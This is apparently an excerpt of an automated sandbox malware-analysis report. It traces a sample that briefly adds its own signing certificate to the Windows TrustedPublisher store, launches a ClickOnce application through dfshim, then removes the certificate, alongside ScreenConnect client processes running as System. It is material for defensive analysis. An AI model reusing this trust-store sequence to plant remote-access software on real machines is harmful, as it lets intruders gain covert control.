                                                                                                                                                                              Imagebase:0x7ff7e52b0000
                                                                                                                                                                              File size:55'320 bytes
                                                                                                                                                                              MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Has exited:false

                                                                                                                                                                              Target ID:14
                                                                                                                                                                              Start time:12:04:57
                                                                                                                                                                              Start date:07/11/2024
                                                                                                                                                                              Path:C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:"C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exe" "RunRole" "7595e846-2dc4-4314-8d6a-fc819222a16f" "System"
                                                                                                                                                                              Imagebase:0x190000
                                                                                                                                                                              File size:601'376 bytes
                                                                                                                                                                              MD5 hash:20AB8141D958A58AADE5E78671A719BF
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Has exited:true

Execution Graph

Execution Coverage:2.2%
Dynamic/Decrypted Code Coverage:0%
Signature Coverage:3.8%
Total number of Nodes:1465
Total number of Limit Nodes:4
5515->5516 5516->5504 5516->5512 5529 f546c2 5517->5529 5519 f54749 5519->5465 5520->5466 5521->5469 5523 f54424 _abort 33 API calls 5522->5523 5524 f56b6b 5523->5524 5524->5476 5526 f56d35 5525->5526 5527 f56cfe 5525->5527 5541 f5572a LeaveCriticalSection 5526->5541 5527->5465 5527->5474 5527->5478 5530 f544a8 _free 15 API calls 5529->5530 5531 f546d8 5530->5531 5532 f546e6 _ValidateLocalCookies 5531->5532 5537 f5474d IsProcessorFeaturePresent 5531->5537 5532->5519 5534 f5473c 5535 f546c2 _abort 21 API calls 5534->5535 5536 f54749 5535->5536 5536->5519 5538 f54758 5537->5538 5539 f54573 _abort 3 API calls 5538->5539 5540 f5476d GetCurrentProcess TerminateProcess 5539->5540 5540->5534 5541->5527 5542->5244 5546 f5572a LeaveCriticalSection 5543->5546 5545 f552e1 5545->5244 5546->5545 5548 f53f8f 5547->5548 5554 f53f85 5547->5554 5549 f54424 _abort 33 API calls 5548->5549 5548->5554 5550 f53fb0 5549->5550 5555 f572d1 5550->5555 5554->5253 5554->5254 5556 f572e4 5555->5556 5557 f53fc9 5555->5557 5556->5557 5563 f56754 5556->5563 5559 f572fe 5557->5559 5560 f57311 5559->5560 5561 f57326 5559->5561 5560->5561 5562 f55249 __fassign 33 API calls 5560->5562 5561->5554 5562->5561 5564 f56760 ___scrt_is_nonwritable_in_current_image 5563->5564 5565 f54424 _abort 33 API calls 5564->5565 5566 f56769 5565->5566 5567 f567b7 _abort 5566->5567 5575 f556e2 EnterCriticalSection 5566->5575 5567->5557 5569 f56787 5576 f567cb 5569->5576 5574 f53f24 _abort 33 API calls 5574->5567 5575->5569 5577 f567d9 __fassign 5576->5577 5579 f5679b 5576->5579 5578 f56507 __fassign 15 API calls 5577->5578 5577->5579 5578->5579 5580 f567ba 5579->5580 5583 f5572a LeaveCriticalSection 5580->5583 5582 f567ae 5582->5567 5582->5574 5583->5582 5588 f54fd0 5584->5588 5591 f5507a _ValidateLocalCookies 5584->5591 5586 f55031 5604 f57cd1 5586->5604 5592 f5634d 5588->5592 5590 f57cd1 38 API calls 5590->5591 5591->5269 5593 f53f72 __fassign 33 API calls 5592->5593 5594 f5636d MultiByteToWideChar 5593->5594 5596 
f563ab 5594->5596 5599 f56443 _ValidateLocalCookies 5594->5599 5598 f562ff 16 API calls 5596->5598 5601 f563cc _abort __alloca_probe_16 5596->5601 5597 f5643d 5609 f5646a 5597->5609 5598->5601 5599->5586 5601->5597 5602 f56411 MultiByteToWideChar 5601->5602 5602->5597 5603 f5642d GetStringTypeW 5602->5603 5603->5597 5605 f53f72 __fassign 33 API calls 5604->5605 5606 f57ce4 5605->5606 5613 f57ab4 5606->5613 5608 f55052 5608->5590 5610 f56476 5609->5610 5611 f56487 5609->5611 5610->5611 5612 f54869 _free 15 API calls 5610->5612 5611->5599 5612->5611 5614 f57acf 5613->5614 5615 f57af5 MultiByteToWideChar 5614->5615 5616 f57ca9 _ValidateLocalCookies 5615->5616 5617 f57b1f 5615->5617 5616->5608 5618 f562ff 16 API calls 5617->5618 5621 f57b40 __alloca_probe_16 5617->5621 5618->5621 5619 f57bf5 5624 f5646a __freea 15 API calls 5619->5624 5620 f57b89 MultiByteToWideChar 5620->5619 5622 f57ba2 5620->5622 5621->5619 5621->5620 5638 f55a15 5622->5638 5624->5616 5625 f57bb9 5625->5619 5626 f57c04 5625->5626 5627 f57bcc 5625->5627 5628 f562ff 16 API calls 5626->5628 5633 f57c25 __alloca_probe_16 5626->5633 5627->5619 5630 f55a15 6 API calls 5627->5630 5628->5633 5629 f57c9a 5632 f5646a __freea 15 API calls 5629->5632 5630->5619 5631 f55a15 6 API calls 5634 f57c79 5631->5634 5632->5619 5633->5629 5633->5631 5634->5629 5635 f57c88 WideCharToMultiByte 5634->5635 5635->5629 5636 f57cc8 5635->5636 5637 f5646a __freea 15 API calls 5636->5637 5637->5619 5639 f55741 _abort 5 API calls 5638->5639 5640 f55a3c 5639->5640 5643 f55a45 _ValidateLocalCookies 5640->5643 5644 f55a9d 5640->5644 5642 f55a85 LCMapStringW 5642->5643 5643->5625 5645 f55741 _abort 5 API calls 5644->5645 5646 f55ac4 _ValidateLocalCookies 5645->5646 5646->5642 5648 f54d5d ___scrt_is_nonwritable_in_current_image 5647->5648 5655 f556e2 EnterCriticalSection 5648->5655 5650 f54d67 5656 f54dbc 5650->5656 5654 f54d80 _abort 5654->5283 5655->5650 5668 f554dc 5656->5668 5658 f54e0a 5659 f554dc 21 API calls 5658->5659 5660 
f54e26 5659->5660 5661 f554dc 21 API calls 5660->5661 5662 f54e44 5661->5662 5663 f54869 _free 15 API calls 5662->5663 5664 f54d74 5662->5664 5663->5664 5665 f54d88 5664->5665 5682 f5572a LeaveCriticalSection 5665->5682 5667 f54d92 5667->5654 5669 f554ed 5668->5669 5677 f554e9 5668->5677 5670 f554f4 5669->5670 5672 f55507 _abort 5669->5672 5671 f547f9 _free 15 API calls 5670->5671 5673 f554f9 5671->5673 5675 f55535 5672->5675 5676 f5553e 5672->5676 5672->5677 5674 f5473d _abort 21 API calls 5673->5674 5674->5677 5678 f547f9 _free 15 API calls 5675->5678 5676->5677 5680 f547f9 _free 15 API calls 5676->5680 5677->5658 5679 f5553a 5678->5679 5681 f5473d _abort 21 API calls 5679->5681 5680->5679 5681->5677 5682->5667 5684 f53f72 __fassign 33 API calls 5683->5684 5685 f55571 5684->5685 5685->5074 5687 f5356a _abort 5686->5687 5688 f53582 5687->5688 5701 f536b8 GetModuleHandleW 5687->5701 5708 f556e2 EnterCriticalSection 5688->5708 5695 f5358a 5700 f535ff _abort 5695->5700 5709 f53c97 5695->5709 5698 f53671 _abort 5698->5107 5712 f53668 5700->5712 5702 f53576 5701->5702 5702->5688 5703 f536fc GetModuleHandleExW 5702->5703 5704 f53726 GetProcAddress 5703->5704 5705 f5373b 5703->5705 5704->5705 5706 f5374f FreeLibrary 5705->5706 5707 f53758 _ValidateLocalCookies 5705->5707 5706->5707 5707->5688 5708->5695 5723 f539d0 5709->5723 5743 f5572a LeaveCriticalSection 5712->5743 5714 f53641 5714->5698 5715 f53677 5714->5715 5744 f55b1f 5715->5744 5717 f53681 5718 f536a5 5717->5718 5719 f53685 GetPEB 5717->5719 5721 f536fc _abort 3 API calls 5718->5721 5719->5718 5720 f53695 GetCurrentProcess TerminateProcess 5719->5720 5720->5718 5722 f536ad ExitProcess 5721->5722 5726 f5397f 5723->5726 5725 f539f4 5725->5700 5727 f5398b ___scrt_is_nonwritable_in_current_image 5726->5727 5734 f556e2 EnterCriticalSection 5727->5734 5729 f53999 5735 f53a20 5729->5735 5731 f539a6 5739 f539c4 5731->5739 5733 f539b7 _abort 5733->5725 5734->5729 5736 f53a48 5735->5736 5738 f53a40 _ValidateLocalCookies 
5735->5738 5737 f54869 _free 15 API calls 5736->5737 5736->5738 5737->5738 5738->5731 5742 f5572a LeaveCriticalSection 5739->5742 5741 f539ce 5741->5733 5742->5741 5743->5714 5745 f55b44 5744->5745 5747 f55b3a _ValidateLocalCookies 5744->5747 5746 f55741 _abort 5 API calls 5745->5746 5746->5747 5747->5717 6207 f5324d 6208 f5522b 46 API calls 6207->6208 6209 f5325f 6208->6209 6218 f5561e GetEnvironmentStringsW 6209->6218 6212 f5326a 6214 f54869 _free 15 API calls 6212->6214 6215 f5329f 6214->6215 6216 f53275 6217 f54869 _free 15 API calls 6216->6217 6217->6212 6219 f55635 6218->6219 6229 f55688 6218->6229 6222 f5563b WideCharToMultiByte 6219->6222 6220 f55691 FreeEnvironmentStringsW 6221 f53264 6220->6221 6221->6212 6230 f532a5 6221->6230 6223 f55657 6222->6223 6222->6229 6224 f562ff 16 API calls 6223->6224 6225 f5565d 6224->6225 6226 f55664 WideCharToMultiByte 6225->6226 6227 f5567a 6225->6227 6226->6227 6228 f54869 _free 15 API calls 6227->6228 6228->6229 6229->6220 6229->6221 6231 f532ba 6230->6231 6232 f5480c _abort 15 API calls 6231->6232 6234 f532e1 6232->6234 6233 f53345 6235 f54869 _free 15 API calls 6233->6235 6234->6233 6237 f5480c _abort 15 API calls 6234->6237 6238 f53347 6234->6238 6242 f53369 6234->6242 6245 f54869 _free 15 API calls 6234->6245 6247 f53eca 6234->6247 6236 f5335f 6235->6236 6236->6216 6237->6234 6240 f53376 15 API calls 6238->6240 6241 f5334d 6240->6241 6243 f54869 _free 15 API calls 6241->6243 6244 f5474d _abort 6 API calls 6242->6244 6243->6233 6246 f53375 6244->6246 6245->6234 6248 f53ed7 6247->6248 6249 f53ee5 6247->6249 6248->6249 6254 f53efc 6248->6254 6250 f547f9 _free 15 API calls 6249->6250 6251 f53eed 6250->6251 6252 f5473d _abort 21 API calls 6251->6252 6253 f53ef7 6252->6253 6253->6234 6254->6253 6255 f547f9 _free 15 API calls 6254->6255 6255->6251 6062 f53d8f 6063 f53d9e 6062->6063 6064 f53db2 6062->6064 6063->6064 6066 f54869 _free 15 API calls 6063->6066 6065 f54869 _free 15 API calls 6064->6065 6067 f53dc4 6065->6067 
6066->6064 6068 f54869 _free 15 API calls 6067->6068 6069 f53dd7 6068->6069 6070 f54869 _free 15 API calls 6069->6070 6071 f53de8 6070->6071 6072 f54869 _free 15 API calls 6071->6072 6073 f53df9 6072->6073 6747 f5430f 6748 f5432a 6747->6748 6749 f5431a 6747->6749 6753 f54330 6749->6753 6752 f54869 _free 15 API calls 6752->6748 6754 f54343 6753->6754 6755 f54349 6753->6755 6756 f54869 _free 15 API calls 6754->6756 6757 f54869 _free 15 API calls 6755->6757 6756->6755 6758 f54355 6757->6758 6759 f54869 _free 15 API calls 6758->6759 6760 f54360 6759->6760 6761 f54869 _free 15 API calls 6760->6761 6762 f5436b 6761->6762 6763 f54869 _free 15 API calls 6762->6763 6764 f54376 6763->6764 6765 f54869 _free 15 API calls 6764->6765 6766 f54381 6765->6766 6767 f54869 _free 15 API calls 6766->6767 6768 f5438c 6767->6768 6769 f54869 _free 15 API calls 6768->6769 6770 f54397 6769->6770 6771 f54869 _free 15 API calls 6770->6771 6772 f543a2 6771->6772 6773 f54869 _free 15 API calls 6772->6773 6774 f543b0 6773->6774 6779 f541f6 6774->6779 6785 f54102 6779->6785 6781 f5421a 6782 f54246 6781->6782 6798 f54163 6782->6798 6784 f5426a 6784->6752 6786 f5410e ___scrt_is_nonwritable_in_current_image 6785->6786 6793 f556e2 EnterCriticalSection 6786->6793 6788 f54142 6794 f54157 6788->6794 6790 f54118 6790->6788 6791 f54869 _free 15 API calls 6790->6791 6791->6788 6792 f5414f _abort 6792->6781 6793->6790 6797 f5572a LeaveCriticalSection 6794->6797 6796 f54161 6796->6792 6797->6796 6799 f5416f ___scrt_is_nonwritable_in_current_image 6798->6799 6806 f556e2 EnterCriticalSection 6799->6806 6801 f54179 6802 f543d9 _abort 15 API calls 6801->6802 6803 f5418c 6802->6803 6807 f541a2 6803->6807 6805 f5419a _abort 6805->6784 6806->6801 6810 f5572a LeaveCriticalSection 6807->6810 6809 f541ac 6809->6805 6810->6809 5968 f555ce GetCommandLineA GetCommandLineW 6074 f51489 6077 f51853 6074->6077 6076 f5148e 6076->6076 6078 f51869 6077->6078 6080 f51872 6078->6080 6081 f51806 GetSystemTimeAsFileTime 
GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 6078->6081 6080->6076 6081->6080 6256 f51248 6257 f51250 6256->6257 6273 f537f7 6257->6273 6259 f5125b 6280 f51664 6259->6280 6261 f5191f 4 API calls 6263 f512f2 6261->6263 6262 f51270 __RTC_Initialize 6271 f512cd 6262->6271 6286 f517f1 6262->6286 6265 f51289 6265->6271 6289 f518ab InitializeSListHead 6265->6289 6267 f5129f 6290 f518ba 6267->6290 6269 f512c2 6296 f53891 6269->6296 6271->6261 6272 f512ea 6271->6272 6274 f53806 6273->6274 6275 f53829 6273->6275 6274->6275 6276 f547f9 _free 15 API calls 6274->6276 6275->6259 6277 f53819 6276->6277 6278 f5473d _abort 21 API calls 6277->6278 6279 f53824 6278->6279 6279->6259 6281 f51674 6280->6281 6282 f51670 6280->6282 6283 f51681 ___scrt_release_startup_lock 6281->6283 6284 f5191f 4 API calls 6281->6284 6282->6262 6283->6262 6285 f516ea 6284->6285 6303 f517c4 6286->6303 6289->6267 6341 f53e2a 6290->6341 6292 f518cb 6293 f518d2 6292->6293 6294 f5191f 4 API calls 6292->6294 6293->6269 6295 f518da 6294->6295 6295->6269 6297 f54424 _abort 33 API calls 6296->6297 6298 f5389c 6297->6298 6299 f547f9 _free 15 API calls 6298->6299 6302 f538d4 6298->6302 6300 f538c9 6299->6300 6301 f5473d _abort 21 API calls 6300->6301 6301->6302 6302->6271 6304 f517d3 6303->6304 6305 f517da 6303->6305 6309 f53c81 6304->6309 6312 f53cf1 6305->6312 6308 f517d8 6308->6265 6310 f53cf1 24 API calls 6309->6310 6311 f53c93 6310->6311 6311->6308 6315 f539f8 6312->6315 6318 f5392e 6315->6318 6317 f53a1c 6317->6308 6319 f5393a ___scrt_is_nonwritable_in_current_image 6318->6319 6326 f556e2 EnterCriticalSection 6319->6326 6321 f53948 6327 f53b40 6321->6327 6323 f53955 6337 f53973 6323->6337 6325 f53966 _abort 6325->6317 6326->6321 6328 f53b56 _abort 6327->6328 6329 f53b5e 6327->6329 6328->6323 6329->6328 6330 f5681b 24 API calls 6329->6330 6336 f53bb7 6329->6336 6333 f53bad 6330->6333 6331 f5681b 24 API calls 6332 f53bcd 6331->6332 6334 f54869 _free 15 API calls 6332->6334 6335 f54869 _free 15 
API calls 6333->6335 6334->6328 6335->6336 6336->6328 6336->6331 6340 f5572a LeaveCriticalSection 6337->6340 6339 f5397d 6339->6325 6340->6339 6342 f53e48 6341->6342 6346 f53e68 6341->6346 6343 f547f9 _free 15 API calls 6342->6343 6344 f53e5e 6343->6344 6345 f5473d _abort 21 API calls 6344->6345 6345->6346 6346->6292 6082 f54c8a 6087 f54cbf 6082->6087 6085 f54ca6 6086 f54869 _free 15 API calls 6086->6085 6088 f54cd1 6087->6088 6089 f54c98 6087->6089 6090 f54cd6 6088->6090 6091 f54d01 6088->6091 6089->6085 6089->6086 6092 f5480c _abort 15 API calls 6090->6092 6091->6089 6098 f5681b 6091->6098 6093 f54cdf 6092->6093 6095 f54869 _free 15 API calls 6093->6095 6095->6089 6096 f54d1c 6097 f54869 _free 15 API calls 6096->6097 6097->6089 6099 f56826 6098->6099 6100 f5684e 6099->6100 6101 f5683f 6099->6101 6102 f5685d 6100->6102 6107 f57e13 6100->6107 6103 f547f9 _free 15 API calls 6101->6103 6114 f57e46 6102->6114 6106 f56844 _abort 6103->6106 6106->6096 6108 f57e33 HeapSize 6107->6108 6109 f57e1e 6107->6109 6108->6102 6110 f547f9 _free 15 API calls 6109->6110 6111 f57e23 6110->6111 6112 f5473d _abort 21 API calls 6111->6112 6113 f57e2e 6112->6113 6113->6102 6115 f57e53 6114->6115 6116 f57e5e 6114->6116 6118 f562ff 16 API calls 6115->6118 6117 f57e66 6116->6117 6124 f57e6f _abort 6116->6124 6119 f54869 _free 15 API calls 6117->6119 6122 f57e5b 6118->6122 6119->6122 6120 f57e74 6123 f547f9 _free 15 API calls 6120->6123 6121 f57e99 HeapReAlloc 6121->6122 6121->6124 6122->6106 6123->6122 6124->6120 6124->6121 6125 f56992 _abort 2 API calls 6124->6125 6125->6124

Control-flow Graph

APIs
• LocalAlloc.KERNEL32(00000000,00000104), ref: 00F51016
• GetModuleFileNameW.KERNEL32(00000000,00000000,00000104), ref: 00F51025
• CertOpenSystemStoreA.CRYPT32(00000000,TrustedPublisher), ref: 00F51032
• LocalAlloc.KERNELBASE(00000000,00040000), ref: 00F51057
• LocalAlloc.KERNEL32(00000000,00040000), ref: 00F51063
• CryptQueryObject.CRYPT32(00000001,00000000,00000400,00000002,00000000,00000000,00000000,00000000,00000000,?,00000000), ref: 00F51082
• CryptMsgGetParam.CRYPT32(?,0000000B,00000000,?,?), ref: 00F510B2
• LocalAlloc.KERNEL32(00000000,?), ref: 00F510C5
• LocalAlloc.KERNEL32(00000000,00002000), ref: 00F510F4
• CryptMsgGetParam.CRYPT32(?,0000000C,00000000,00000000,00002000), ref: 00F5110A
• CertCreateCertificateContext.CRYPT32(00000001,00000000,00002000), ref: 00F5111A
• CertAddCertificateContextToStore.CRYPT32(?,00000000,00000001,00000000), ref: 00F5112D
• CertFreeCertificateContext.CRYPT32(00000000), ref: 00F51134
• LocalFree.KERNEL32(00000000), ref: 00F5113E
• LocalFree.KERNEL32(00000000), ref: 00F5115D
• CryptMsgGetParam.CRYPT32(?,00000009,00000000,00000000,00040000), ref: 00F5116E
• CryptMsgGetParam.CRYPT32(?,0000000A,00000000,?,00040000), ref: 00F51182
• CertFindAttribute.CRYPT32(1.3.6.1.4.1.311.4.1.1,00000000,?), ref: 00F51198
• CertFindAttribute.CRYPT32(1.3.6.1.4.1.311.4.1.1,?,?), ref: 00F511A9
• LoadLibraryA.KERNELBASE(dfshim), ref: 00F511BA
• GetProcAddress.KERNEL32(00000000,ShOpenVerbApplicationW), ref: 00F511C6
• Sleep.KERNELBASE(00009C40), ref: 00F511E8
• CertDeleteCertificateFromStore.CRYPT32(?), ref: 00F5120B
• CertCloseStore.CRYPT32(?,00000000), ref: 00F5121A
• LocalFree.KERNEL32(?), ref: 00F51223
• LocalFree.KERNEL32(?), ref: 00F51228
• LocalFree.KERNEL32(?), ref: 00F5122D
Strings
Memory Dump Source
• Source File: 00000000.00000002.3001736513.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
• Associated: 00000000.00000002.3001721154.0000000000F50000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3001753306.0000000000F5B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3001770543.0000000000F61000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3001785750.0000000000F63000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_f50000_pzPO97QouM.jbxd
Similarity
• API ID: Local$Cert$Free$AllocCrypt$CertificateParamStore$Context$AttributeFind$AddressCloseCreateDeleteFileFromLibraryLoadModuleNameObjectOpenProcQuerySleepSystem
• String ID: 1.3.6.1.4.1.311.4.1.1$ShOpenVerbApplicationW$TrustedPublisher$dfshim
• API String ID: 335784236-860318880
• Opcode ID: e5af08840baf65df6d0486a53e7be090f5c2e449f8c0643c20c98d752faca017
• Instruction ID: c9d6db2612414b7c761e39c364596765efd4517b90db731e88f7caae79daea81
• Opcode Fuzzy Hash: e5af08840baf65df6d0486a53e7be090f5c2e449f8c0643c20c98d752faca017
• Instruction Fuzzy Hash: E1614E71A4031CABEB219B94DC45FAFBBB9FF48B52F100055EB14B72D0C771A905ABA4
APIs
• IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 00F5192B
• IsDebuggerPresent.KERNEL32 ref: 00F519F7
• SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00F51A10
• UnhandledExceptionFilter.KERNEL32(?), ref: 00F51A1A
Memory Dump Source
• Source File: 00000000.00000002.3001736513.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
• Associated: 00000000.00000002.3001721154.0000000000F50000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3001753306.0000000000F5B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3001770543.0000000000F61000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3001785750.0000000000F63000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_f50000_pzPO97QouM.jbxd
Similarity
• API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
• String ID:
• API String ID: 254469556-0
• Opcode ID: 58a75c914891cda4ce78f2a52ada0545dd8f7b1070874bb6542ed2a39f0c4a79
• Instruction ID: 54cf8d52634072542b7072cb0db3a0bfaf3f84c4e92e5188f0600f8393dad9c5
• Opcode Fuzzy Hash: 58a75c914891cda4ce78f2a52ada0545dd8f7b1070874bb6542ed2a39f0c4a79
• Instruction Fuzzy Hash: 71311875D013189BDB21DF64DD497CDBBB8BF08301F1041AAE90DAB290EB759A84DF45
                                                                                                                                                                                APIs
                                                                                                                                                                                • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 00F5466B
                                                                                                                                                                                • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00F54675
                                                                                                                                                                                • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 00F54682
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3906539128-0
                                                                                                                                                                                • Opcode ID: 8a44434db0e3c1f5f761d39b2479767e26d7423ec19d8071c8b03a13ee826fe1
                                                                                                                                                                                • Instruction ID: 746a8183eb416173e34796c3c66ccf6efd1026351a52037eda4d857e5117893f
                                                                                                                                                                                • Opcode Fuzzy Hash: 8a44434db0e3c1f5f761d39b2479767e26d7423ec19d8071c8b03a13ee826fe1
                                                                                                                                                                                • Instruction Fuzzy Hash: 8531D37490121CABCB21DF64DC88B8DBBB8BF08311F5041EAE91CA7290EB749B859F45
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetCurrentProcess.KERNEL32(?,?,00F5364D,?,00F602E0,0000000C,00F537A4,?,00000002,00000000,?,00F53F66,00000003,00F5209F,00F51AFC), ref: 00F53698
                                                                                                                                                                                • TerminateProcess.KERNEL32(00000000,?,00F5364D,?,00F602E0,0000000C,00F537A4,?,00000002,00000000,?,00F53F66,00000003,00F5209F,00F51AFC), ref: 00F5369F
                                                                                                                                                                                • ExitProcess.KERNEL32 ref: 00F536B1
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1703294689-0
                                                                                                                                                                                • Opcode ID: 09d0ca039b90683c76180363433c897fb6a765a08765fc7cac23a6f92f405394
                                                                                                                                                                                • Instruction ID: db9d581be84b2ed646dd65a2a553641482e8f89d7bc9830e9095a77ae00f1681
                                                                                                                                                                                • Opcode Fuzzy Hash: 09d0ca039b90683c76180363433c897fb6a765a08765fc7cac23a6f92f405394
                                                                                                                                                                                • Instruction Fuzzy Hash: F0E09231410648ABCF11AF58DD09A5A3B69AF40796B004018FF559A2B1DB39DA46EA90
                                                                                                                                                                                Strings
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: .
                                                                                                                                                                                • API String ID: 0-248832578
                                                                                                                                                                                • Opcode ID: 0ed20c7a46c3a50588492960f8c049d22ffb453fc9ffff070977e5e5042ea4d0
                                                                                                                                                                                • Instruction ID: ec146a1a362a3bfc12d16687b0281206cf3e8ddd198a81a9313350dcc8f6c3dd
                                                                                                                                                                                • Opcode Fuzzy Hash: 0ed20c7a46c3a50588492960f8c049d22ffb453fc9ffff070977e5e5042ea4d0
                                                                                                                                                                                • Instruction Fuzzy Hash: 2931E671D002497BCB249E78CC84FFB7BBDEB85319F044198FA19D7251E674AD889B50
                                                                                                                                                                                APIs
                                                                                                                                                                                • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00F5A490,?,?,00000008,?,?,00F5A130,00000000), ref: 00F5A6C2
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ExceptionRaise
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3997070919-0
                                                                                                                                                                                • Opcode ID: 1d24817622248de0a37a443774e546bb77e4fc1bc0ecb54d2eeffb5cc6c23467
                                                                                                                                                                                • Instruction ID: 57610a730bae039e8f8f2ce45c39bd25c2b4b6957d8490e928270b79825ec87b
                                                                                                                                                                                • Opcode Fuzzy Hash: 1d24817622248de0a37a443774e546bb77e4fc1bc0ecb54d2eeffb5cc6c23467
                                                                                                                                                                                • Instruction Fuzzy Hash: FCB17F32510608CFD715CF28C48AB647BE0FF04366F298658EE9ACF2A1C335D9A6DB41
                                                                                                                                                                                APIs
                                                                                                                                                                                • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00F51BEA
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: FeaturePresentProcessor
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2325560087-0
                                                                                                                                                                                • Opcode ID: 6b04518de8737ed3437dec8c2360a0cdfa4261fa515915fd5fffe77696bde311
                                                                                                                                                                                • Instruction ID: 66574a904757c3973c90b0f9cd41315f48ddc15b9659c1143472280e33b53976
                                                                                                                                                                                • Opcode Fuzzy Hash: 6b04518de8737ed3437dec8c2360a0cdfa4261fa515915fd5fffe77696bde311
                                                                                                                                                                                • Instruction Fuzzy Hash: E551BFB1E102098FEB15CF64D9857AEBBF0FB88325F18812AC911EB290D3B5AD44DF50
                                                                                                                                                                                APIs
                                                                                                                                                                                • SetUnhandledExceptionFilter.KERNEL32(Function_00001AB8,00F51300), ref: 00F51AB1
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3192549508-0
                                                                                                                                                                                • Opcode ID: 196de356ecca64fc24d3493574e93edb955c004c1e1d1659c3354e680b9698ec
                                                                                                                                                                                • Instruction ID: 094dde747b4cfec3f90e6f1996635de2ebd02552048c45d97235c8aa2b585b32
                                                                                                                                                                                • Opcode Fuzzy Hash: 196de356ecca64fc24d3493574e93edb955c004c1e1d1659c3354e680b9698ec
                                                                                                                                                                                • Instruction Fuzzy Hash:
                                                                                                                                                                                APIs
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: HeapProcess
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 54951025-0

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                APIs
                                                                                                                                                                                • ___free_lconv_mon.LIBCMT ref: 00F5654B
                                                                                                                                                                                  • Part of subcall function 00F56078: _free.LIBCMT ref: 00F56095
                                                                                                                                                                                  • Part of subcall function 00F56078: _free.LIBCMT ref: 00F560A7
                                                                                                                                                                                  • Part of subcall function 00F56078: _free.LIBCMT ref: 00F560B9
                                                                                                                                                                                  • Part of subcall function 00F56078: _free.LIBCMT ref: 00F560CB
                                                                                                                                                                                  • Part of subcall function 00F56078: _free.LIBCMT ref: 00F560DD
                                                                                                                                                                                  • Part of subcall function 00F56078: _free.LIBCMT ref: 00F560EF
                                                                                                                                                                                  • Part of subcall function 00F56078: _free.LIBCMT ref: 00F56101
                                                                                                                                                                                  • Part of subcall function 00F56078: _free.LIBCMT ref: 00F56113
                                                                                                                                                                                  • Part of subcall function 00F56078: _free.LIBCMT ref: 00F56125
                                                                                                                                                                                  • Part of subcall function 00F56078: _free.LIBCMT ref: 00F56137
                                                                                                                                                                                  • Part of subcall function 00F56078: _free.LIBCMT ref: 00F56149
                                                                                                                                                                                  • Part of subcall function 00F56078: _free.LIBCMT ref: 00F5615B
                                                                                                                                                                                  • Part of subcall function 00F56078: _free.LIBCMT ref: 00F5616D
                                                                                                                                                                                • _free.LIBCMT ref: 00F56540
                                                                                                                                                                                  • Part of subcall function 00F54869: HeapFree.KERNEL32(00000000,00000000,?,00F5620D,?,00000000,?,00000000,?,00F56234,?,00000007,?,?,00F5669F,?), ref: 00F5487F
                                                                                                                                                                                  • Part of subcall function 00F54869: GetLastError.KERNEL32(?,?,00F5620D,?,00000000,?,00000000,?,00F56234,?,00000007,?,?,00F5669F,?,?), ref: 00F54891
                                                                                                                                                                                • _free.LIBCMT ref: 00F56562
                                                                                                                                                                                • _free.LIBCMT ref: 00F56577
                                                                                                                                                                                • _free.LIBCMT ref: 00F56582
                                                                                                                                                                                • _free.LIBCMT ref: 00F565A4
                                                                                                                                                                                • _free.LIBCMT ref: 00F565B7
                                                                                                                                                                                • _free.LIBCMT ref: 00F565C5
                                                                                                                                                                                • _free.LIBCMT ref: 00F565D0
                                                                                                                                                                                • _free.LIBCMT ref: 00F56608
